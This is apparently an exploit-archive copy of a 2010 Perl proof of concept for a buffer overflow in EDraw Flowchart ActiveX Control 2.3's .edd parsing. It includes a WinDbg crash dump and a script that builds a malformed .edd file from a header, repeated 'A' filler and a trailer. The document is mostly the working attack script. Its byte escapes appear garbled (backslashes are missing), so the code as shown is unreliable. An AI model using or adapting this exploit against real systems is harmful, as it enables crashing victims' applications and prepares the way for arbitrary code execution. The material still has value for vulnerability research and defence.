EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
# Published : 2010-04-22
# Author : LiquidWorm
# Previous Title : ZipWrangler 1.20 (.zip) SEH 0day exploit
# Next Title : ZipGenius zgtips.dll Stack Buffer Overflow
#!/usr/bin/perl
#
#
# Title: EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
#
#
# Vendor: EdrawSoft
#
# Product Web Page: http://www.edrawsoft.com
#
# Summary: Do you want to learn how to draw? Now you can online! Learn how to draw like a
#	   local application with Edraw Flowchart ActiveX Control that lets you quickly
#	   build basic flowcharts, organizational charts, business charts, hr diagram,
#	   work flow, programming flowchart and network diagrams.
#
# Description: EDraw Flowchart ActiveX Control version 2.3 suffers from a buffer overflow
#	       vulnerability when parsing .edd file format resulting in an application
#	       crash and overwritten few memory registers which can aid the attacker to
#	       execute arbitrary code.
#
# Tested On: Microsoft Windows XP Professional SP3 (EN)
#
# Version Tested: 2.3.0.6
#
#
# Windbg:
# --------------------------------------------------------------------------------------
#
# (305c.1ee4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=027a0020 ebx=00000000 ecx=0c841000 edx=3fffff45 esi=0012f2e4 edi=41414141
# eip=10083bbd esp=0012f198 ebp=01055734 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# EDImage!DllUnregisterServer+0x5594d:
# 10083bbd 895904          mov     dword ptr [ecx+4],ebx ds:0023:0c841004=????????
#
# --------------------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
#
# liquidworm gmail com
#
#
#
# 20.04.2010
#
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4935.php
#
#


$pqbdpq = "x00x0Cx00x00x00x00x00x00x00x33x73x46x44x1Fx55x8Cx44x00".
	  "x00x3Dx43x00x00x3Dx43x00x00x3Dx43x00x00x3Dx43x00x00x80".
	  "x3FxFFxFFxFFxFFxFFx90x99xAExFFx6Cx72x82x02x00x00x00x01".
	  "x00x00x00xFFxFFx00x03xFFx22x37xEAx01x00x00x00xFFxADxD8".
	  "xE6x02x00x00x00x00x00x00x00x00x00x80x3Fx02x00x00x00x01".
	  "x00x00x00xFFxF4x00x00x00x00x00x00x00x00x42x43x1FxF5xA3".
	  "x44x33x73x46x44x00x00xA0x40x33xB3x75x44x00x00x42x43x00".
	  "x00xA0x40x1Fx55x8Cx44x00x00x3Dx43x00x00x3Dx43x33x73x46".
	  "x44x1Fx55x8Cx44x00x01x00xFFxFFx00x00x06x00x43x53x52x65".
	  "x63x74x01x00x00xA8x2Cx02x00x00x00x00x00x00x01x00x00x00".
	  "x00x00x00x00x55x01x00x00xD7x01x00x00xDCx01x00x00x76x02".
	  "x00x00x00x00xAEx43x00x00xFBx43x00x00xEAx43x00x80x1Bx44".
	  "x00x00xCCx43x00x80x1Bx44x00x00x80x3Fx00x00x80x3Fx00x00".
	  "x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00x80x3F".
	  "x00x00xF0x42x00x00xF0x42x00x00x00x00x00x00x00x00x00x00".
	  "xCCx43x00x80x0Cx44x08x00x00x00x06x43x53x52x65x63x74x00".
	  "x00x00x80x3Fx00x00x00x00x00x06x31x30x30x31x2Cx32x00xFF".
	  "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
	  "x80x3Fx00x00x00x00xFExFFxFFxFFxFFxFFxFFxFFxFFx00x00x00".
	  "xFFx00x00x00x00x00x80x3Fx01x00x00x00x00x00x00x00xFFx00".
	  "x00x00x00x02x00x00x00x00x00x00x00x02x00x00x00x00x00x00".
	  "x00xFFx02x00x00x00xFExFFxFFxFFxFFx00x00x00xFFxFFxFFxFF".
	  "x00x00x01x00xFFxFFx00x00x08x00x43x54x65x78x74x4Fx62x6A".
	  "x00x00x01x20x2Dx02x00x00x00x00x00x00x00x00x00x02x00x00".
	  "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
	  "x00x00x20x44x00x00x20x44x00x00x3Ex44x00x00x3Ex44x00x00".
	  "x2Fx44x00x00x3Ex44x00x00x80x3Fx00x00x80x3Fx00x00x80x3F".
	  "x00x00x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00".
	  "xE6x42x00x00xE6x42x00x00x00x00x00x00x00x00x00x00xCCx43".
	  "x00x80x0Cx44x00x00x00x00x08x43x54x65x78x74x4Fx62x6Ax00".
	  "x00x00x00x00x00x00x00x00x00x00x00xFFx00x00x00x00x00x00".
	  "x00x00x00x00x00x00x00x00x00x00x00x00x80x3Fx00x00x00x00".
	  "xFExFFxFFxFFxFFxFFxFFxFFxFFx00x00x00xFFxFFxFFxFFx00x00".
	  "x80x3Fx01x00x00x00x00x00x00x00xFFx00x00x00x00x02x00x00".
	  "x00x00x00x00x00x02x00x00x00x00x00x00x00xFFx02x00x00x00".
	  "xFExFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx00x00x00x00x00x00".
	  "x00x00x10x00x00x00x00x00x00x00xCCx43x00x40xFCx43x00x00".
	  "x00x00x00x00x00x00x00x00x04x00x00x00x00x40xAFx43x00x40".
	  "xFCx43x01x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00".
	  "x04x00x00x00x00x00xCCx43x00x40xFCx43x01x00x00x00x20x00".
	  "x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00xC0xE8x43".
	  "x00x40xFCx43x01x00x00x00x20x00x00x00x00x00x00x00x00x00".
	  "x00x00x04x00x00x00x00xC0xE8x43x00x80x0Cx44x01x00x00x00".
	  "x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00";



$qpdbqp = "xC0xE8x43x00xE0x1Ax44x01x00x00x00x20x00x00x00x00x00x00".
	  "x00x00x00x00x00x04x00x00x00x00x00xCCx43x00xE0x1Ax44x01".
	  "x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00".
	  "x00x00x40xAFx43x00xE0x1Ax44x01x00x00x00x20x00x00x00x00".
	  "x00x00x00x00x00x00x00x04x00x00x00x00x40xAFx43x00x80x0C".
	  "x44x01x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00x04".
	  "x00x00x00x00x00xCCx43x00xC0xEFx43x01x00x00x00x40x00x00".
	  "x00x00x00x00x00x00x00x00x00x04x00x00x00x00x00xCCx43x00".
	  "x80x0Cx44x03x00x00x00x01x00x00x00x00x00x00x00x00x00x00".
	  "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
	  "x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00".
	  "x00x00x00x00x00x00x00x00x00x00x34x25x0Dx10xFFx00x00x00".
	  "xFFxFFxFFx00x02x00x00x00x05x00x00x00x04xCBxCExCCxE5x0A".
	  "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFx05".
	  "x00x00x00x00x00x00xCCx43x00x00xFBx43x01x00x00xEAx43x00".
	  "xC0x08x44x01x00x80xE2x43x00x80x1Bx44x01x00x80xB5x43x00".
	  "x80x1Bx44x81x00x00xAEx43x00xC0x08x44x10x00x00x00x00x00".
	  "x00x00xCCx43x00x00xFBx43x00x00x00x00x00x00x00x00x05x00".
	  "xFFxFFx00x00x07x00x43x43x74x72x6Cx50x74x04x00x00x00x00".
	  "x00xCCx43x00x00xFBx43x01x00x00x00x02x00x00x00x00x00x00".
	  "x00x00x00x00xBFx05x80x04x00x00x00x00x00xAEx43x00xC0x08".
	  "x44x01x00x00x00x02x00x00x00x00x00x00xBFx00x00x00xBEx05".
	  "x80x04x00x00x00x00x00xEAx43x00xC0x08x44x01x00x00x00x02".
	  "x00x00x00x00x00x00x3Fx00x00x00xBEx05x80x04x00x00x00x00".
	  "x80xB5x43x00x80x1Bx44x01x00x00x00x02x00x00x00x00x00xC0".
	  "xBEx00x00x00x3Fx05x80x04x00x00x00x00x80xE2x43x00x80x1B".
	  "x44x01x00x00x00x02x00x00x00x00x00xC0x3Ex00x00x00x3Fx04".
	  "x00x00x00x00x00xAEx43x00x00xFBx43x01x00x00x00x20x00x00".
	  "x00x00x00x00x00x00x00x00x00x04x00x00x00x00x00xCCx43x00".
	  "x00xFBx43x01x00x00x00x20x00x00x00x00x00x00x00x00x00x00".
	  "x00x04x00x00x00x00x00xEAx43x00x00xFBx43x01x00x00x00x20".
	  "x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00x00xEA".
	  "x43x00x80x0Cx44x01x00x00x00x20x00x00x00x00x00x00x00x00".
	  "x00x00x00x04x00x00x00x00x00xEAx43x00x80x1Bx44x01x00x00".
	  "x00x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00".
	  "x00xCCx43x00x80x1Bx44x01x00x00x00x20x00x00x00x00x00x00".
	  "x00x00x00x00x00x04x00x00x00x00x00xAEx43x00x80x1Bx44x01".
	  "x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00".
	  "x00x00x00xAEx43x00x80x0Cx44x01x00x00x00x20x00x00x00x00".
	  "x00x00x00x00x00x00x00x04x00x00x00x00x00xCCx43x00x80xEE".
	  "x43x01x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x04".
	  "x00x00x00x00x00xCCx43x00x80x0Cx44x03x00x00x00x01x00x00".
	  "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
	  "x00x00x00x00x00x00x00x00x00x00x00x00x00";



$dpqpqb = "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	  "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	  "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	  "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	  "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	  "x41x41x41x41x41x41x41x41x41x41";



$bppqqd = "Draw_Totally.edd";

open edd, ">./$bppqqd" || die "nCan't open $bppqqd: $!";

print edd "$pqbdpq" . "$dpqpqb x 50" . "$qpdbqp";

print "n ~ Buffering...n"; sleep 1;

close edd;

print "n ~ File $bppqqd ready!n";